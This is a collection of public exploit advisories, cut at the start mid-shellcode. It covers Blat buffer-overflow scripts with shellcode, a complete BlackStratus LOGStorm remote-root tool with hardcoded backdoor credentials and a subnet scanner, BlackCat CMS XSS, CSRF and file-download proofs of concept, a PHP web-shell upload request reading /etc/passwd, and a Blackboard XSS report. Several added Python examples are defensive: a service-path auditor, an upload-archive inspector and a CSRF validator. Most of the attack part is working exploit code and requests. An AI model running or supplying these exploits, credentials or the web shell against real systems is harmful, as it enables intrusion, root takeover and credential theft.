"\x60\xb9\xaf\x62\xdb\x7a\x07\xc0\x91\xc0\xd0\x19\x0e\x6b\x36"
"\x7e\xb1\x74\x39\xe9\x22\xf3\x9d\xca\xd4\x62\x7a\x6e\x67\x0d"
"\xc9\x15\x14\xbe\xe0\x0e\x52\x1c\x26\xbb\xea\x7e\x4e\xcb\xb4"
"\xa0\xae\x43\x20\xcc\xcf\xff\x9b\xc7\x87\x4c\xf8\xd2\x1e\xad"
"\x31\x0f\x72\x7d\x63\xfd\x8d\x51\xb2\xc1\x21\xad\xe0\xc9"
)
buf += '\x90\x90\x90\x90'*5
buf += 'E'*200
bfile.write(buf)
bfile.close()
1. Vulnerable Product Version:
*Blat v3.2.14*
Link: blat.net
2. Vulnerability Information
Impact: Attacker may gain administrative access / can perform a DOS
Remotely Exploitable: No
Locally Exploitable: May be possible
3. Product Details
An open source Windows (32 & 64 bit) command line SMTP mailer. We can use
it to automatically email logs, the contents of a html FORM, or whatever
else you need to send.
Since Blat is lightweight, user friendly and simple (but awesome), many
vendors incorporate it into their software. I have seen Blat in many
commercial software packages that use it for sending mail to their customers. And
Blat is awesome.
4. Vulnerability Description
The overflow vulnerability lies in the profile option parameter "-p". When
a string of 236 bytes is sent to Blat, the EBP and EIP registers get
overwritten by the user input.
Reproduction:
* blat.exe crashes with this command blat.exe –install
smtp.my.tld 127.0.0.1 –p <”A”*234+”B”*2>*
Feeding this command overwrites EBP with 0x00410041 and EIP with 0x00420042
(Please refer to the attached screen shot)
5. Links
https://sourceforge.net/projects/blat/
https://groups.yahoo.com/neo/groups/blat/conversations/messages/13759
'''
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-BLAT-MAILER-BUFFER-OVERFLOW.txt
Vendor:
================================
www.blat.net
http://sourceforge.net/projects/blat/
Product:
================================
Blat v2.7.6
blat.exe is a Win32 command line eMail tool
that sends eMail using SMTP or post to usenet using NNTP.
Vulnerability Type:
=====================
Stack Buffer Overflow
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
An older release of blat.exe, v2.7.6, is prone to a stack-based buffer
overflow when passed malicious command line arguments. Two arguments are
needed: the first can be anything, e.g. "AAAA"; the second triggers the
buffer overflow and executes arbitrary code on the victim's OS.
Stack dump...
EAX 00000826
ECX 0018E828 ASCII "Blat saw and processed these options, and was
confused by the last one...
AAAAAAA...
EDX 0008E3C8
EBX 000000E1
ESP 0018F05C ASCII "AAAAA...
EBP 41414141
ESI 00426E88 blat.00426E88
EDI 00272FD8
EIP 41414141 <-------------- BOOM!
C 0 ES 002B 32bit 0(FFFFFFFF)
P 1 CS 0023 32bit 0(FFFFFFFF)
A 0 SS 002B 32bit 0(FFFFFFFF)
Z 1 DS 002B 32bit 0(FFFFFFFF)
S 0 FS 0053 32bit 7EFDD000(FFF)
T 0 GS 002B 32bit 0(FFFFFFFF)
D 0
O 0 LastErr ERROR_SUCCESS (00000000)
EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE)
Exploit code(s):
===============
Python script to exploit...
'''
import struct,os,subprocess
#pop calc.exe Windows 7 SP1
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")
vulnpgm="C:\\blat276\\full\\blat.exe "
eip=struct.pack('<L', 0x776D0115) #<--- JMP ESP kernel32.dll
payload="A"*2018+eip+"\x90"*20+sc
subprocess.Popen([vulnpgm, "A"*4, payload], shell=False)
'''
Disclosure Timeline:
=========================================================
Oct 14, 2015 : Public Disclosure
Severity Level:
=========================================================
Med
===========================================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that
due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given
to the author.
The author is not responsible for any misuse of the information
contained herein and prohibits any malicious use of all security
related information or exploits by the author or elsewhere.
by hyp3rlinx
'''
#!/usr/bin/python
# logstorm-root.py
#
# BlackStratus LOGStorm Remote Root Exploit
#
# Jeremy Brown [jbrown3264/gmail]
# Dec 2016
#
# -Synopsis-
#
# "Better Security and Compliance for Any Size Business"
#
# BlackStratus LOGStorm has multiple vulnerabilities that allow a remote unauthenticated user, among
# other things, to assume complete control over the virtual appliance with root privileges. This is
# possible due to multiple network servers listening for network connections by default, allowing
# authorization with undocumented credentials supported by appliance's OS, web interface and sql server.
#
# -Tested-
#
# v4.5.1.35
# v4.5.1.96
#
# -Usage-
#
# Dependencies: pip install paramiko MySQL-python
#
# There are (5) actions provided in this script: root, reset, sql, web and scan.
#
# [root] utilizes bug #1 to ssh login to a given <host> as root and run the 'id' command
# [reset] utilizes bug #2 to ssh login to a given <host> as privileged htinit user and resets the root password
# [sql*] utilizes bug #3 to sql login to a given <host> as privileged htr user and retrieve web portal credentials
# [web] utilizes bug #4 to http login to a given <host> as hardcoded webserveruser (presumably) admin account
# [scan] scans a given <host>/24 for potentially vulnerable appliances
#
# *sql only works remotely before license validation as afterwards sql server gets firewalled, becoming local only.
#
# Note: this exploit is not and cannot be weaponized simply because exploits are not weapons.
#
# -Fixes-
#
# BlackStratus did not coherently respond to product security inquiries, so there's no official fix. But
# customers may (now) root the appliance themselves to change the passwords, disable root login, firewall
# network services or remove additional user accounts to mitigate these vulnerabilities.. or choose another
# product altogether because this appliance, as of today, simply adds too much attack surface to the network.
#
# -Bonuses-
#
# 1) Another account's (htftp/htftp) shell is set to /bin/false, which affords at least a couple attacks
#
# 1.1) The appliance is vulnerable to CVE-2016-3115, which we can use to read/write to arbitrary files
# 1.2) We can use the login to do port forwarding and hit local services, such as the Java instance running
# in debug mode and probably exploitable with jdwp-shellifer.py (also netcat with -e is installed by default!)
#
# 2) More sql accounts: htm/htm_pwd and tvs/tvs_pwd
#
import sys
import socket
import time
from paramiko import ssh_exception
import paramiko
import MySQLdb
import httplib
import urllib
SSH_BANNER = "_/_/_/_/"
SSH_PORT = 22
MYSQL_PORT = 3306
MYSQL_DB = "htr"
MYSQL_CMD = "select USER_ID,hex(MD5_PASSWORD) from users;"
WEB_URL = "/tvs/layout/j_security_check"
ROOT_CREDS = ["root", "3!acK5tratu5"]
HTINIT_CREDS = ["htinit", "htinit"]
MYSQL_CREDS = ["htr", "htr_pwd"]
WEB_CREDS = ["webserviceuser", "donotChangeOnInstall"]
def main():
if(len(sys.argv) < 2):
print("Usage: %s <action> <host>" % sys.argv[0])
print("Eg. %s root 10.1.1.3\n" % sys.argv[0])
print("Actions: root reset sql web scan")
return
action = str(sys.argv[1])
host = str(sys.argv[2])
if("scan" not in action):
try:
socket.inet_aton(host)
except socket.error:
print("[-] %s doesn't look like a valid ip address" % host)
return
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
#
# ssh login as root and execute 'id'
#
if(action == "root"):
try:
ssh.connect(host, SSH_PORT, ROOT_CREDS[0], ROOT_CREDS[1], timeout=SSH_TIMEOUT)
except ssh_exception.AuthenticationException:
            print("\n[-] Action failed, could not login with root credentials\n")
            return
        print("[+] Success!")
        ssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command("id")
        print(ssh_stdout.readline())
        return
    #
    # ssh login as htinit and reset root password to the default
    #
    elif(action == "reset"):
        print("[~] Resetting password on %s..." % host)
        try:
            ssh.connect(host, SSH_PORT, HTINIT_CREDS[0], HTINIT_CREDS[1], timeout=SSH_TIMEOUT)
        except ssh_exception.AuthenticationException:
            print("\n[-] Reset failed, could not login with htinit credentials\n")
            return
        ssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command("")
        ssh_stdin.write("4" + "\n")
        time.sleep(2)
        ssh_stdin.write(ROOT_CREDS[1] + "\n")
        time.sleep(2)
        ssh_stdin.write("^C" + "\n")
        time.sleep(1)
        print("[+] Appliance root password should now be reset")
        return
    #
    # sql login as htr and select user/hash columns from the web users table
    #
    elif(action == "sql"):
        print("[~] Asking %s for it's web users and their password hashes..." % host)
        try:
            db = MySQLdb.connect(host=host, port=MYSQL_PORT, user=MYSQL_CREDS[0], passwd=MYSQL_CREDS[1], db=MYSQL_DB, connect_timeout=3)
        except MySQLdb.Error as error:
            print("\n[-] Failed to connect to %s:\n%s\n" % (host, error))
            return
        cursor = db.cursor()
        cursor.execute(MYSQL_CMD)
        data = cursor.fetchall()
        print("[+] Got creds!\n")
        for row in data:
            print("USER_ID: %s\nMD5_PASSWORD: %s\n" % (row[0], row[1]))
        db.close()
        return
    #
    # http login as webserviceuser and gain presumably admin privileges
    #
    elif(action == "web"):
        print("[~] Attempting to login as backdoor web user at %s..." % host)
        try:
            client = httplib.HTTPSConnection(host)
        except:
            print("[-] Couldn't establish SSL connection to %s" % host)
            return
        params = urllib.urlencode({"j_username" : WEB_CREDS[0], "j_password" : WEB_CREDS[1]})
        headers = {"Host" : host, "Content-Type" : "application/x-www-form-urlencoded", "Content-Length" : "57"}
        client.request("POST", WEB_URL, params, headers)
        response = client.getresponse()
        if(response.status == 408):
            print("[+] Success!")
        else:
            print("[-] Service returned %d %s, which is actually not our criteria for success" % (response.status, response.reason))
        return
    #
    # check the ssh network banner to identify appliances within range of <host>/24
    #
    elif(action == "scan"):
        count = 0
        print("[~] Scanning %s for LOGStorm appliances..." % sys.argv[2])
        for x in range(1,255):
            banner = None
            #
            # 10.1.1.1/24 -> 10.1.1.[x]
            #
            host = str(sys.argv[2]).split('/')[0][:-1] + str(x)
            try:
                ssh.connect(host, SSH_PORT, "user-that-doesnt-exist", "pass-that-doesnt-work", timeout=2)
            except ssh_exception.NoValidConnectionsError:
                pass
            except socket.timeout:
                pass
            except ssh_exception.AuthenticationException as error:
                banner = ssh._transport.get_banner()
            if banner and SSH_BANNER in banner:
                print("[!] %s\n" % host)
                count+=1
        print("[+] Found %d appliance(s)"% count)
        return

if __name__ == "__main__":
    main()
source: https://www.securityfocus.com/bid/57910/info
BlackNova Traders is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/bnt/news.php?startdate=2013/02/11[SQLi]
# Exploit Title: BlackMoon FTP Server 3.1.2.1731 - 'BMFTP-RELEASE' Unquoted Service Path
# Exploit Author: Debashis Pal
# Date: 2019-10-17
# Vendor : Blackmoonftpserver
# Source: http://www.tucows.com/preview/222822/BlackMoon-FTP-Server?q=FTP+server
# Version: BlackMoon FTP Server 3.1.2.1731
# CVE : N/A
# Tested on: Windows 7 SP1(64bit), Windows 7 SP1(32bit)
1. Description:
The 'BMFTP-RELEASE' service installed by BlackMoon FTP Server 3.1.2.1731 is registered with an unquoted service path.
2. PoC:
C:\>sc qc BMFTP-RELEASE
sc qc BMFTP-RELEASE
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: BMFTP-RELEASE
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Selom Ofori\BlackMoon FTP Server\FTPService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : BlackMoon FTP Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
3. Exploit:
A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot.
If successful, the local user's code would execute with the elevated privileges of the application.
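The check an administrator would run to find services like this one, given here as an added example that is not part of the advisory. It is written in Python (not PowerShell) to match the rest of this page: it parses `sc qc`-style output, flags any service whose unquoted image path contains a space, and produces the `sc config <name> binPath=` value that remediates it. The sample output below is constructed from the advisory's listing; the `sc config` remediation is the standard one and is an assumption of this example rather than something the advisory states.

```python
import re
from typing import Dict, Optional

# Constructed sample: the `sc qc BMFTP-RELEASE` listing from the advisory.
SAMPLE_SC_QC = r"""
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: BMFTP-RELEASE
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\Selom Ofori\BlackMoon FTP Server\FTPService.exe
        DISPLAY_NAME       : BlackMoon FTP Service
        SERVICE_START_NAME : LocalSystem
"""

_FIELD = re.compile(r"^\s*([A-Z_]+)\s*:\s*(.*)$")
_EXE = re.compile(r"(?i)(.*?\.exe)(.*)$")


def parse_sc_qc(output: str) -> Dict[str, str]:
    """Turn `sc qc` output into a {FIELD_NAME: value} mapping."""
    fields: Dict[str, str] = {}
    for line in output.splitlines():
        m = _FIELD.match(line)
        if m:
            fields[m.group(1)] = m.group(2).strip()
    return fields


def is_unquoted_service_path(bin_path: str) -> bool:
    """True when the executable part of the image path contains a space and is
    not wrapped in double quotes; arguments after the .exe are ignored."""
    path = bin_path.strip()
    if not path or path.startswith('"'):
        return False
    m = _EXE.match(path)
    exe = m.group(1) if m else path
    return " " in exe


def quoted_bin_path(bin_path: str) -> str:
    """Remediated value: executable quoted, trailing arguments preserved."""
    path = bin_path.strip()
    m = _EXE.match(path)
    if not m:
        return '"%s"' % path
    return '"%s"%s' % (m.group(1), m.group(2))


def audit_service(sc_qc_output: str) -> Optional[Dict[str, str]]:
    """Return a finding for a vulnerable service, or None when the path is safe."""
    fields = parse_sc_qc(sc_qc_output)
    bin_path = fields.get("BINARY_PATH_NAME", "")
    if not is_unquoted_service_path(bin_path):
        return None
    name = fields.get("SERVICE_NAME", "?")
    fixed = quoted_bin_path(bin_path)
    return {
        "service": name,
        "runs_as": fields.get("SERVICE_START_NAME", "?"),
        "binary_path": bin_path,
        # Re-register the image path with the executable quoted; the inner
        # quotes are escaped for cmd.exe.
        "fix": 'sc config %s binPath= "%s"' % (name, fixed.replace('"', '\\"')),
    }


if __name__ == "__main__":
    finding = audit_service(SAMPLE_SC_QC)
    if finding:
        for key, value in finding.items():
            print("%-12s %s" % (key + ":", value))
```

Feed the function the output of `sc qc <service>` for every service (`sc query` lists them); a finding whose `runs_as` is `LocalSystem` is the high-value case, exactly as in the listing above.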
# Disclaimer
=============
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information.
The author prohibits any malicious use of security related information or exploits by the author or elsewhere.
Exploit Title: Blackcat Cms v1.4 - Stored XSS
Application: blackcat Cms
Version: v1.4
Bugs: Stored XSS
Technology: PHP
Vendor URL: https://blackcat-cms.org/
Software Link: https://github.com/BlackCatDevelopment/BlackCatCMS
Date of found: 13.07.2023
Author: Mirabbas Ağalarov
Tested on: Linux
2. Technical Details & POC
========================================
steps:
1. Log in to an account
2. Go to pages (http://localhost/BlackCatCMS-1.4/upload/backend/pages/modify.php?page_id=1)
3. Set the value to <img src=x onerror=alert(4)>
4. Visit http://localhost/BlackCatCMS-1.4/upload/page/welcome.php?preview=1
Exploit Title: Blackcat Cms v1.4 - Remote Code Execution (RCE)
Application: blackcat Cms
Version: v1.4
Bugs: RCE
Technology: PHP
Vendor URL: https://blackcat-cms.org/
Software Link: https://github.com/BlackCatDevelopment/BlackCatCMS
Date of found: 13.07.2023
Author: Mirabbas Ağalarov
Tested on: Linux
2. Technical Details & POC
========================================
steps:
1. Log in to an account as admin
2. Go to admin-tools => jquery plugin (http://localhost/BlackCatCMS-1.4/upload/backend/admintools/tool.php?tool=jquery_plugin_mgr)
3. Upload a zip file; the zip file must contain poc.php
poc.php file contents:
<?php $a=$_GET['code']; echo system($a);?>
4. Go to http://localhost/BlackCatCMS-1.4/upload/modules/lib_jquery/plugins/poc/poc.php?code=cat%20/etc/passwd
Poc request
POST /BlackCatCMS-1.4/upload/backend/admintools/tool.php?tool=jquery_plugin_mgr HTTP/1.1
Host: localhost
Content-Length: 577
Cache-Control: max-age=0
sec-ch-ua:
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBRByJwW3CUSHOcBT
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/BlackCatCMS-1.4/upload/backend/admintools/tool.php?tool=jquery_plugin_mgr
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: cat7288sessionid=7uv7f4kj7hm9q6jnd6m9luq0ti
Connection: close
------WebKitFormBoundaryBRByJwW3CUSHOcBT
Content-Disposition: form-data; name="upload"
1
------WebKitFormBoundaryBRByJwW3CUSHOcBT
Content-Disposition: form-data; name="userfile"; filename="poc.zip"
Content-Type: application/zip
PKvalsdalsfapoc.php<?php
$a=$_GET['code'];
echo system($a);
?>
blabalaboalpoc.php
blablabla
------WebKitFormBoundaryBRByJwW3CUSHOcBT
Content-Disposition: form-data; name="submit"
Upload
------WebKitFormBoundaryBRByJwW3CUSHOcBT--
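The root cause above is that the plugin manager extracts whatever the archive contains into a web-served directory. As an added example (not BlackCat's code), the following Python inspects an uploaded plugin archive before extraction and rejects server-side scripts (including double extensions such as `shell.php.png`), path-traversal entry names, symlinks, and oversized archives, allowing only an allowlist of asset types. The allowlist, limits and `build_archive` helper are constructed for the example.

```python
import io
import posixpath
import zipfile
from typing import List, Sequence, Tuple

# Anything the web server might execute if it lands under the document root.
SCRIPT_EXTENSIONS = {".php", ".phtml", ".php3", ".php4", ".php5", ".php7", ".phar",
                     ".cgi", ".pl", ".py", ".jsp", ".asp", ".aspx", ".sh"}
# What a jQuery plugin package legitimately contains (constructed allowlist).
ALLOWED_EXTENSIONS = {".js", ".css", ".map", ".json", ".md", ".txt", ".html",
                      ".png", ".jpg", ".jpeg", ".gif", ".svg", ".woff", ".woff2"}
MAX_ENTRIES = 500
MAX_UNCOMPRESSED_BYTES = 20 * 1024 * 1024


def _is_symlink(info: zipfile.ZipInfo) -> bool:
    # Unix mode bits live in the high 16 bits of external_attr.
    return (info.external_attr >> 16) & 0o170000 == 0o120000


def inspect_plugin_archive(data: bytes) -> List[str]:
    """Return the reasons an uploaded plugin archive must be rejected; an empty
    list means it passed every check. Only the central directory is read, so
    nothing is written to disk before the decision is made."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return ["not a zip archive"]
    problems: List[str] = []
    infos = zf.infolist()
    if len(infos) > MAX_ENTRIES:
        problems.append("too many entries (%d)" % len(infos))
    total = 0
    for info in infos:
        name = info.filename
        total += info.file_size
        norm = posixpath.normpath(name.replace("\\", "/"))
        first = norm.split("/", 1)[0]
        if name.startswith("/") or norm == ".." or norm.startswith("../") or ":" in first:
            problems.append("path traversal in entry %r" % name)
            continue
        if _is_symlink(info):
            problems.append("symlink entry %r" % name)
            continue
        if info.is_dir():
            continue
        # Judge every suffix, so shell.php.png is treated like shell.php.
        suffixes = {"." + part for part in posixpath.basename(norm).lower().split(".")[1:]}
        if suffixes & SCRIPT_EXTENSIONS:
            problems.append("server-side script in entry %r" % name)
        elif not suffixes & ALLOWED_EXTENSIONS:
            problems.append("disallowed file type in entry %r" % name)
    if total > MAX_UNCOMPRESSED_BYTES:
        problems.append("uncompressed size %d exceeds limit" % total)
    return problems


def build_archive(entries: Sequence[Tuple[str, str]]) -> bytes:
    """Construct an in-memory archive from (name, content) pairs, for testing the checks."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in entries:
            zf.writestr(name, content)
    return buf.getvalue()


if __name__ == "__main__":
    sample = build_archive([("poc/poc.php", "placeholder"), ("poc/plugin.js", "// ok")])
    print(inspect_plugin_archive(sample))
```

Extension checks alone are not a complete defence: the plugin directory should additionally be served with script execution disabled (for Apache, a `php_admin_flag engine off` or equivalent in that directory's configuration), so that a file which slips through is delivered as static content rather than run.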
# Exploit Title: BlackCat CMS 1.3.6 - Cross-Site Request Forgery
# Date: 2020-06-01
# Exploit Author: Noth
# Vendor Homepage: https://github.com/BlackCatDevelopment/BlackCatCMS
# Software Link: https://github.com/BlackCatDevelopment/BlackCatCMS
# Version: v1.3.6
# CVE : CVE-2020-25453
BlackCat CMS v1.3.6 has a CSRF vulnerability (bypass csrf_token) that allows remote arbitrary code execution.
PoC (Remove the csrf_token value) :
<input type="hidden" name="__csrf_magic" value=""/>
-------------------------------------------------------------------------------------------------------------------------------------------------
<html>
<body>
<script>history.pushState(",",'/')</script>
<form action="http://127.0.0.1/blackcatcms-release-1.3/backend/login/ajax_index.php" method="POST">
<input type="hidden" name="__csrf_magic" value=""/>
<input type="hidden" name="username_fieldname" value="username_274807982ed4"/>
<input type="hidden" name="password_fieldname" value="password_75868428f837"/>
<input type="hidden" name="_cat_ajax" value="1"/>
<input type="hidden" name="username_274807982ed4" value="accountname"/>
<input type="hidden" name="password_75868428f837" value="yourpassword"/>
<input type="submit" value="Submit request"/>
</form>
</body>
</html>
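The bypass works because an empty `__csrf_magic` value is accepted. Server-side validation that closes it, as an added example in Python rather than BlackCat's PHP: a per-session random token, an explicit rejection of missing or empty submissions, a constant-time comparison, and an Origin header check in front of the token check. The `handle_login` handler and its status strings are constructed for the example; only the field name `__csrf_magic` comes from the advisory.

```python
import hmac
import secrets
from typing import Dict, Mapping, Optional, Set

TOKEN_FIELD = "__csrf_magic"  # hidden field name used by the advisory's PoC form


def issue_csrf_token(session: Dict[str, str]) -> str:
    """Generate a fresh unguessable token and bind it to the server-side session."""
    token = secrets.token_urlsafe(32)
    session[TOKEN_FIELD] = token
    return token


def csrf_token_is_valid(session: Mapping[str, str], form: Mapping[str, str]) -> bool:
    """Accept only a non-empty submitted token equal to the session's token.
    Missing and empty values are rejected before any comparison, which is the
    case the advisory's PoC relies on."""
    expected = session.get(TOKEN_FIELD)
    submitted = form.get(TOKEN_FIELD)
    if not expected or not submitted:
        return False
    return hmac.compare_digest(expected, submitted)


def handle_login(session: Mapping[str, str], form: Mapping[str, str],
                 origin_header: Optional[str], allowed_origins: Set[str]) -> str:
    """Constructed request handler: the Origin check runs first (browsers send it on
    cross-site POSTs), then the token check. Returns a status line."""
    if origin_header is not None and origin_header not in allowed_origins:
        return "403 cross-site origin"
    if not csrf_token_is_valid(session, form):
        return "403 bad csrf token"
    return "200 ok"


if __name__ == "__main__":
    session: Dict[str, str] = {}
    token = issue_csrf_token(session)
    print(handle_login(session, {TOKEN_FIELD: ""}, "http://127.0.0.1", {"http://127.0.0.1"}))
    print(handle_login(session, {TOKEN_FIELD: token}, "http://127.0.0.1", {"http://127.0.0.1"}))
```

Marking the session cookie `SameSite=Lax` or `Strict` adds a browser-enforced layer on top of this, but the server-side token check remains the control that has to be correct.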
# Exploit Title: BlackCat CMS 1.3.6 - 'Multiple' Stored Cross-Site Scripting (XSS)
# Date: 04/07/2021
# Exploit Author: Ömer Hasan Durmuş
# Vendor Homepage: https://blackcat-cms.org/
# Software Link: https://blackcat-cms.org/page/download.php
# Version: BlackCat CMS - 1.3.6
Step 1 : Login to admin account in http://TARGET/backend/start/index.php
Step 2 : Then click on the "Addons"
Step 3 : Click on "Create new"
Step 4 : Input "<script>alert(1)</script>" in the field "Module / language name"
Step 5 : Update or visit new page.
Step 1 : Login to admin account in http://TARGET/backend/start/index.php
Step 2 : Then click on the "Access"
Step 3 : Click on "Manage groups"
Step 4 : Input "<script>alert(1)</script>" in the field "Group name" and click "Add group"
Step 5 : Update or visit new page.
# Exploit Title: BlackCat CMS 1.3.6 - 'Display name' Cross Site Scripting (XSS)
# Date: 16-02-2021
# Exploit Author: Kamaljeet Kumar - TATA Advanced Systems Limited
# Vendor Homepage: https://blackcat-cms.org/
# Software Link: https://blackcat-cms.org/page/download.php
# Version: BlackCat CMS - 1.3.6
# Tested on: Windows
# Steps to Reproduce:
1. To exploit this vulnerability an attacker logs in to the admin panel and clicks on the admin profile button, then enters the XSS payload " onmouseover=alert(1) " in the Display name field and clicks on the Save button.
2. Then refresh the page and hover the mouse over the Display name field; the XSS message pops up.
# Exploit Title: BlackCat CMS v1.1.1 Arbitrary File Download Vulnerability
# Date: 2015/06/16
# Vendor Homepage: http://blackcat-cms.org/
# Software Link: http://blackcat-cms.org/temp/packetyzer/blackcatcms_2fo3PXdKj1.zip
# Version: v1.1.1
# Tested on: Centos 6.5,PHP 5.4.41
# Category: webapps
* Description
file: /modules/blackcat/widgets/logs.php (lines 72-100)
// download
if(CAT_Helper_Validate::sanitizeGet('dl'))
{
    $file = CAT_Helper_Directory::sanitizePath(CAT_PATH.'/temp/'.CAT_Helper_Validate::sanitizeGet('dl')); // <-- Not Taint Checking
    if(file_exists($file))
    {
        $zip = CAT_Helper_Zip::getInstance(pathinfo($file,PATHINFO_DIRNAME).'/'.pathinfo($file,PATHINFO_FILENAME).'.zip');
        $zip->config('removePath',pathinfo($file,PATHINFO_DIRNAME))
            ->create(array($file));
        if(!$zip->errorCode() == 0)
        {
            echo CAT_Helper_Validate::getInstance()->lang()->translate("Unable to pack the file")
                . ": ".str_ireplace( array( str_replace('\\','/',CAT_PATH),'\\'), array('/abs/path/to','/'), $file );
        }
        else
        {
            $filename = pathinfo($file,PATHINFO_DIRNAME).'/'.pathinfo($file,PATHINFO_FILENAME).'.zip';
            header("Pragma: public"); // required
            header("Expires: 0");
            header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
            header("Cache-Control: private",false); // required for certain browsers
            header("Content-Type: application/zip");
            header("Content-Disposition: attachment; filename=\"".basename($filename)."\";" );
            header("Content-Transfer-Encoding: binary");
            header("Content-Length: ".filesize($filename));
            readfile("$filename");
            exit;
        }
    }
}
POC:
curl -sH 'Accept-encoding: gzip' "http://10.1.1.1/blackcat/modules/blackcat/widgets/logs.php?dl=../config.php" |gunzip -
Document Title:
===============
Blackboard LMS 9.1 SP14 - (Profile) Persistent Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1900
Release Date:
=============
2017-01-09
Vulnerability Laboratory ID (VL-ID):
====================================
1900
Common Vulnerability Scoring System:
====================================
4.2
Product & Service Introduction:
===============================
Blackboard Learn (previously the Blackboard Learning Management System), is a virtual learning environment and course management system
developed by Blackboard Inc. It is Web-based server software which features course management, customizable open architecture, and scalable
design that allows integration with student information systems and authentication protocols. It may be installed on local servers or hosted
by Blackboard ASP Solutions. Its main purposes are to add online elements to courses traditionally delivered face-to-face and to develop
completely online courses with few or no face-to-face meetings.
(Copy of the Homepage: http://www.blackboard.com/learning-management-system/blackboard-learn.aspx )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered an application-side input validation vulnerability in the official Blackboard LMS 9.1 SP14.
Vulnerability Disclosure Timeline:
==================================
2017-01-09: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
BlackBoard Inc.
Product: Blackboard LMS - Content Management System 9.1 SP 14
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
================================
A persistent cross-site scripting web vulnerability has been discovered in the official Blackboard LMS web application.
Remote attackers are able to inject malicious code into the profile information module. The vulnerability is located in
the first name and last name fields of the user profile (the vulnerable parameters are userVO.firstName and userVO.lastName).
The issue allows an attacker to inject their own malicious JavaScript code into the vulnerable module context. The execution
of the vulnerability occurs in the Blackboard LMS main panel and user management module. During our investigation we discovered
that users with low privileged access are able to inject their own JavaScript code to compromise other moderator or admin
session credentials. The request method to inject is POST and the attack vector of the issue is persistent. The execution
occurs each time an account visits the profile page of the attacking user account.
The security risk of the vulnerability is estimated as medium with a CVSS (Common Vulnerability Scoring System) count of 4.2.
Exploitation of the web vulnerability requires a low privileged user account with restricted access and low user interaction.
Successful exploitation of the vulnerability results in persistent phishing mails, session hijacking, persistent external
redirects to malicious sources and application-side manipulation of affected or connected module context.
Proof of Concept (PoC):
=======================
The persistent vulnerability can be exploited by remote attackers with low privileged web-application user account and low user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
Manual steps to reproduce the vulnerability ...
1. Register in the Blackboard LMS course as a student.
2. Go to the profile information section and inject the persistent payload into the firstname or lastname input fields.
Note: https://b-lms.localhost:8000/webapps/Bb-sites-user-profile-BBLEARN/profile.form
3. Submit the data; it is saved via a POST request without secure parsing by the web validation.
4. The execution of the vulnerability occurs in the user management:
https://b-lms.localhost:8000/webapps/Bb-sites-enrollment-manager-BBLEARN/enrollmentManager.form?course_id=_431252_1
5. Successfully reproduce the application-side web validation vulnerability!
--- PoC Session Logs [POST] ---
POST /webapps/Bb-sites-user-profile-BBLEARN/profile.form HTTP/1.1
Host: b-lms.localhost:8000
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://b-lms.localhost:8000/webapps/Bb-sites-user-profile-BBLEARN/profile.form
